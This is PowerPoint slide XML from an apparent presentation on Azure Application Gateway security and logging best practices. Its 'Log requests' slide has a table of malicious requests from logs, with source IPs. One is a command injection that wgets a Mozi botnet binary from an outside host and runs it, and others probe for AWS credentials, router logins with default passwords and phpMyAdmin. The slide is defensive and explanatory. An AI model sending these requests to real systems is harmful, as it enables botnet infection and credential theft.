          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8087FC80-FF0C-7F2C-21D2-59FB8A58425F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094931" y="4813075"/>
            <a:ext cx="8519850" cy="1022953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351146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Inhaltsplatzhalter 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5F13CA-F255-7C44-2273-27EA142DEF95}"/>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3182112" y="11749"/>
            <a:ext cx="9009888" cy="6846252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Titel 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339FF589-27A1-4BEB-A6BC-262035C83FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078992" y="815925"/>
            <a:ext cx="7973568" cy="836605"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Revenue from cloud computing* worldwide from 2010 to 2021 and forecast to 2023</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3092855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92B98E-6183-0057-EEA9-B947B6931496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B738B43F-88FB-072C-BCB9-03A1BF8EFC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6286500"/>
            <a:ext cx="7507224" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/application-gateway-security-baseline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F17B037-35CB-24CA-F5C2-251E89EFC3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2887" y="2635699"/>
            <a:ext cx="840702" cy="840702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8028144E-3933-28D1-22BA-F4295E79B9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06311" y="4113897"/>
            <a:ext cx="917830" cy="917830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Gerade Verbindung mit Pfeil 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63039EF-E7D3-F175-BD4F-6F8707A55F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545757" y="3056050"/>
            <a:ext cx="9971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131FCC20-A607-99CF-4FDC-3906199EDD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383589" y="3056050"/>
            <a:ext cx="14997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8810821A-4795-3A42-55F5-9C53B7724314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963238" y="3476401"/>
            <a:ext cx="1988" cy="6374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BB1F53B6-D9A4-CC7B-BF61-4F4D5628C2E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476334" y="2762239"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Textfeld 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBC1598-B624-A5FA-F433-9F3ABED14E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971835" y="3548076"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Textfeld 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E17DD30-D3A8-71B0-3E9F-709EFFCFE24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3349456" y="2740739"/>
            <a:ext cx="1786128" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Grafik 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34266FF-55BA-8EF7-DD14-D7F26A40915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61287" y="2699897"/>
            <a:ext cx="640629" cy="640629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Grafik 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BEF3C33-5CB0-4F1F-48D1-08CA3186C20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5995" y="2635699"/>
            <a:ext cx="670209" cy="670209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="27" name="Tabelle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1768DC2-A0D2-CD8F-8B34-A38C399E55E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577710765"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4048486" y="4078700"/>
          <a:ext cx="7815855" cy="1885012"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{93296810-A885-4BE3-A3E7-6D5BEEA58F35}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6530005">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1865489820"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1285850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2144798218"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="229950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2209433005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="383250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>shell?cd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>+/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>tmp;rm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>+-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>rf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>+*;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>wget+http</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>://171.38.239.187:48934/Mozi.a;chmod+777+Mozi.a;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>171.38.239.187</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1476438106"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="268525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>aws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>credentials</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>109.237.97.180 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3170836681"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="229950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/?XDEBUG_SESSION_START=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>phpstorm</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>152.89.196.211 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2309431750"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="229950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>boaform</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>admin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>formLogin?username</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>user&amp;psd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>user</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>118.252.86.68</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="799347571"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330532">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>administrator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>/phpMyAdmin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
                        <a:t>index.php?lang</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>=en</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1200" dirty="0"/>
                        <a:t>183.77.131.179</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3526078608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Gerader Verbinder 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0948785-8AAE-C9B1-274C-AE15585C1678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3424141" y="4113897"/>
            <a:ext cx="624345" cy="458915"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Gerade Verbindung mit Pfeil 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D40EC7D-8057-5EDA-2511-85965FAD5AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965226" y="5031727"/>
            <a:ext cx="1081272" cy="931985"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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32" name="Textfeld 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C21D9D-5023-97C9-3554-02D94F31E1BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753083" y="3332363"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Textfeld 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BCF1E4-C2E1-8EED-C740-D1DD3AA97487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824401" y="3382848"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Textfeld 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42609F1A-F11C-B53B-EE6F-66C7BD376B76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271550" y="4522093"/>
            <a:ext cx="1220831" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>Log Analytics Workspace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="709644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92B98E-6183-0057-EEA9-B947B6931496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
